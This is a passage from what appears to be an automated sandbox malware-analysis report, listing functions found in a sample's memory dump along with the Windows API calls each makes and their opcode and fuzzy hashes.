                                          • Opcode ID: 4f7079be380e06e21960ef128e4e7c04c79cdcc0fc35e79648a4d2b2e1f3187d
                                          • Instruction ID: 31896fb0d5bb715ed7165638a4f652e1520ec8fbc793ee722b0eeee8a5aaf87a
                                          • Opcode Fuzzy Hash: 4f7079be380e06e21960ef128e4e7c04c79cdcc0fc35e79648a4d2b2e1f3187d
                                          • Instruction Fuzzy Hash: 8F11A5726002109FD710EF29D855A2AF7E9FF84324F00991EF9A5E73A1DB30AC04CB91
                                          Function 00E5C86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00E0BB8A,?,?,?), ref: 00E5C8E1
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E5C8C7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                                          • String ID:
                                          • API String ID: 1273190321-0
                                          • Opcode ID: cf8c0a3c523ed3e0c51ee7b310663b21a35c0668e11e093020a3274ca1915e05
                                          • Instruction ID: 74fcb7be1d5c2ac7b289f03da440d9525ee0d18fe6a48582cb1e620f297ac864
                                          • Opcode Fuzzy Hash: cf8c0a3c523ed3e0c51ee7b310663b21a35c0668e11e093020a3274ca1915e05
                                          • Instruction Fuzzy Hash: FB01D831200304AFCB295F15DC55E667BB6FF85365F24092AFD512B2E0C771A809EBA1
                                          Function 00E5CC2E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 00E5CC51
                                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00E0BC66,?,?,?,?,?), ref: 00E5CC7A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClientDialogNtdllProc_Screen
                                          • String ID:
                                          • API String ID: 3420055661-0
                                          • Opcode ID: eb3f580a12106dfc7a37c69e424097116da89f3dd1b14104f31e07259d57d465
                                          • Instruction ID: 48d20146e2f8f8df7134e2067c67bba67615d9938a86f2e05eec3d7d32773a96
                                          • Opcode Fuzzy Hash: eb3f580a12106dfc7a37c69e424097116da89f3dd1b14104f31e07259d57d465
                                          • Instruction Fuzzy Hash: 89F0307241021CFFDF098F46DC099BE7BB9FF48312F14455AF94562161D3716A54DBA0
                                          Function 00E3A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E4977D,?,00E5FB84,?), ref: 00E3A302
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E4977D,?,00E5FB84,?), ref: 00E3A314
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 24f749b6986b2123fd960e10264365646e5e505356af96efedb3895949e759ab
                                          • Instruction ID: 925fecf21c0a14180e8d7af562bb290e92c6e6a6a2abfe391c2ea6e518ab8594
                                          • Opcode Fuzzy Hash: 24f749b6986b2123fd960e10264365646e5e505356af96efedb3895949e759ab
                                          • Instruction Fuzzy Hash: 47F0823554532DABEB20AFA4CC4CFEA776DFF08761F0041A6F909E7191D6309944CBA1
                                          Function 00E5CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00E5CD74
                                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00E0BBE5,?,?,?,?), ref: 00E5CDA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogLongNtdllProc_Window
                                          • String ID:
                                          • API String ID: 2065330234-0
                                          • Opcode ID: de0056b103b44c100e5589b09442725ecaedc763870b9f57a7f7dacfd7df2f2e
                                          • Instruction ID: c18ae1beec602b7d338c8ed0f8f2d34a2a53465f20bc4ca910536c2cd7604252
                                          • Opcode Fuzzy Hash: de0056b103b44c100e5589b09442725ecaedc763870b9f57a7f7dacfd7df2f2e
                                          • Instruction Fuzzy Hash: 44E08670100354BFEB195F1ADC19FBA3B64EB04752F508A25FD56E90E1C7719854D760
                                          Function 00E28713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E28851), ref: 00E28728
                                          • CloseHandle.KERNEL32(?,?,00E28851), ref: 00E2873A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 0b8d0b80f51f71d8fc85937d63f940e8f2f32013cf55ed26e29f98b0f7d45410
                                          • Instruction ID: 95a8c028844bb1ef75612147ec858363f84cb34014660b73e5ed10ebaefa61d6
                                          • Opcode Fuzzy Hash: 0b8d0b80f51f71d8fc85937d63f940e8f2f32013cf55ed26e29f98b0f7d45410
                                          • Instruction Fuzzy Hash: 02E0B676011610EEEB252B61ED09D777BA9EB04355B258829F59690470DB62AC90DB20
                                          Function 00DFA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,00E64178,00DF8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00DFA39A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00DFA3A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 1044575febe27a4c30ea90cd75226395fadd3a07655bc58ec07f392fecd485db
                                          • Instruction ID: a450e5198cc7f0f9ff577d7475b65ae170e16f4668acab8b3ee5d4e1c7a3ea52
                                          • Opcode Fuzzy Hash: 1044575febe27a4c30ea90cd75226395fadd3a07655bc58ec07f392fecd485db
                                          • Instruction Fuzzy Hash: 17B09231054308AFEA042F92ED09B893F68EB44AA3F404420F60D94070CB6254548A91
                                          Function 00DFF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6d59b06a99ec0b34ea424a1c13ba8177b70e0af8058c81f202d26fef3c0d4d6
                                          • Instruction ID: b69cac6552b5f9718cc0b0674b40ee97d2f9eb8869a480752c47d729abe7d7ee
                                          • Opcode Fuzzy Hash: d6d59b06a99ec0b34ea424a1c13ba8177b70e0af8058c81f202d26fef3c0d4d6
                                          • Instruction Fuzzy Hash: E6322722D69F054DD7235635E872336A289AFB73C8F16D737F859B5AA6EB28C4C34100
                                          Function 00E0267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d6a84a62d21202f58ec996f8d82befe5eca9a6f74d86f5b99f45a33dd06f41c
                                          • Instruction ID: ac3e55562b5192cad7c326e497ae8ea25e02e34152fdb43f190644ecbca77073
                                          • Opcode Fuzzy Hash: 9d6a84a62d21202f58ec996f8d82befe5eca9a6f74d86f5b99f45a33dd06f41c
                                          • Instruction Fuzzy Hash: E7B11220D2AF404DD323963A9835337BA8CAFBB2C5F55D72BFC2670E62EB6185834541
                                          Function 00E38B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • __time64.LIBCMT ref: 00E38B25
                                            • Part of subcall function 00DF543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E391F8,00000000,?,?,?,?,00E393A9,00000000,?), ref: 00DF5443
                                            • Part of subcall function 00DF543A: __aulldiv.LIBCMT ref: 00DF5463
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Time$FileSystem__aulldiv__time64
                                          • String ID:
                                          • API String ID: 2893107130-0
                                          • Opcode ID: a32b4b42308d3380e6d3a0dc45c9ad5aa62e72d33aabf9eae78940a376d72d49
                                          • Instruction ID: 633297bcd293677a3d44c05e44e6a931f4346bc810394c24a8f0658d82d3864e
                                          • Opcode Fuzzy Hash: a32b4b42308d3380e6d3a0dc45c9ad5aa62e72d33aabf9eae78940a376d72d49
                                          • Instruction Fuzzy Hash: 35210272635610CFC329CF25D441A52B7E1EBA4310F288E2DE4E5DB2D0CA30B949CB94
                                          Function 00E5DA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00E5DB46
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogLongNtdllProc_Window
                                          • String ID:
                                          • API String ID: 2065330234-0
                                          • Opcode ID: 3359f03e216c710b1f20649cbdda735fff08665212c5fb2c921e3de4987ec6c8
                                          • Instruction ID: f6cf93d57ba20f8f16489c3d1479e930d84451d936c8f37d136b82744e08d017
                                          • Opcode Fuzzy Hash: 3359f03e216c710b1f20649cbdda735fff08665212c5fb2c921e3de4987ec6c8
                                          • Instruction Fuzzy Hash: DF113A31208225BFEB359E2CCC05FBB3765E781B22F605B16FD11BB1D2CA609D089361
                                          Function 00E5D6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00E0BBA2,?,?,?,?,00000000,?), ref: 00E5D740
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogLongNtdllProc_Window
                                          • String ID:
                                          • API String ID: 2065330234-0
                                          • Opcode ID: c9f658f4645ca830dd11b8c0cc4d5193bea13a2a486fc01aa58db5683f78f313
                                          • Instruction ID: aa9ab7e8d5b899a6461fe6eb98f7bbb9e88b40b46f65ef0da0bf2e4708f99412
                                          • Opcode Fuzzy Hash: c9f658f4645ca830dd11b8c0cc4d5193bea13a2a486fc01aa58db5683f78f313
                                          • Instruction Fuzzy Hash: D101F535604118AFDF248F69DC85AF93B91EB4932AF041527FD153B191C330AC2997A0
                                          Function 00E5C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                            • Part of subcall function 00DD2344: GetCursorPos.USER32(?), ref: 00DD2357
                                            • Part of subcall function 00DD2344: ScreenToClient.USER32(00E967B0,?), ref: 00DD2374
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000001), ref: 00DD2399
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000002), ref: 00DD23A7
                                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00E0BC4F,?,?,?,?,?,00000001,?), ref: 00E5C272
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                          • String ID:
                                          • API String ID: 2356834413-0
                                          • Opcode ID: 8a899fbc5f55733ddbb9518084b4803c52da5a01f8d00752253d28d02d72c36a
                                          • Instruction ID: f52bb633d95df8d48241f959f676465186e2f00fd4b861d83b343ea391cb9687
                                          • Opcode Fuzzy Hash: 8a899fbc5f55733ddbb9518084b4803c52da5a01f8d00752253d28d02d72c36a
                                          • Instruction Fuzzy Hash: FCF0E234204228AFCF04AF49CC16EBA3BA1EB14751F000416F9466B2A1CB71A864DBF0
                                          Function 00DD189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00DD1B04,?,?,?,?,?), ref: 00DD18E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogLongNtdllProc_Window
                                          • String ID:
                                          • API String ID: 2065330234-0
                                          • Opcode ID: 652bdbf670ecdb8c0e53b47562249122859971e87802667061e0e69e0470c3a9
                                          • Instruction ID: 8f1e0c154c22c01ccee0861f91929e4393dcd6163a1e86d7e58696c0ac4dcc8d
                                          • Opcode Fuzzy Hash: 652bdbf670ecdb8c0e53b47562249122859971e87802667061e0e69e0470c3a9
                                          • Instruction Fuzzy Hash: DBF05E34600215AFDB18DF56D86197637A2FB54350F10452BF9525B3A1DB31DC60EB60
                                          Function 00E441FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • BlockInput.USER32(00000001), ref: 00E44218
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          • Opcode ID: 88195c5d8c46b2e2807f303a8a4dc349607691210a00bd4a5b4dd9ae616f89cd
                                          • Instruction ID: a86f100620c62d6b37b247772ca541b4a102e818704834ee3736972347186db0
                                          • Opcode Fuzzy Hash: 88195c5d8c46b2e2807f303a8a4dc349607691210a00bd4a5b4dd9ae616f89cd
                                          • Instruction Fuzzy Hash: EAE012712502145FC710AF59E454A9AF7D8EF54761F009416F849D7361DAB1A8408BA0
                                          Function 00E5CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00E5CBEE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogNtdllProc_
                                          • String ID:
                                          • API String ID: 3239928679-0
